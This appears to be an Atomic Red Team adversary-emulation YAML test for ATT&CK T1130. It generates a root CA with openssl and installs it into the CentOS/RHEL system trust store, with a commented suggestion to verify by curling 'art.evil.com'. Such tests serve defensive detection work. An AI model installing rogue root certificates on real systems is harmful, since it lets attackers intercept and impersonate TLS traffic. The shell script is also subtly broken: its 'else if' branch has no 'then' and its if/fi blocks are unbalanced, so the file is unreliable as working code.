Mo Amiri
41 lines
1.2 KiB
YAML
41 lines
1.2 KiB
YAML
---
|
|
attack_technique: T1130
|
|
display_name: Install Root Certificate
|
|
|
|
atomic_tests:
|
|
- name: Install root CA on CentOS/RHEL
|
|
description: |
|
|
Creates a root CA with openssl
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
key_filename:
|
|
description: Key we create that is used to create the CA certificate
|
|
type: Path
|
|
default: rootCA.key
|
|
cert_filename:
|
|
description: Path of the CA certificate we create
|
|
type: Path
|
|
default: rootCA.crt
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
openssl genrsa -out #{key_filename} 4096
|
|
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
|
|
|
|
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
|
|
then
|
|
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
|
|
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
|
|
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
|
|
update-ca-trust
|
|
fi
|
|
|
|
# TODO: there was some note about testing like this:
|
|
|
|
# # Testing the trusted certificate.
|
|
# To test the new trust, apply the root certificate or another signed with it to
|
|
# a SSL/TLS web service and attempt a connection with curl or wget.
|
|
#
|
|
# curl https://art.evil.com
|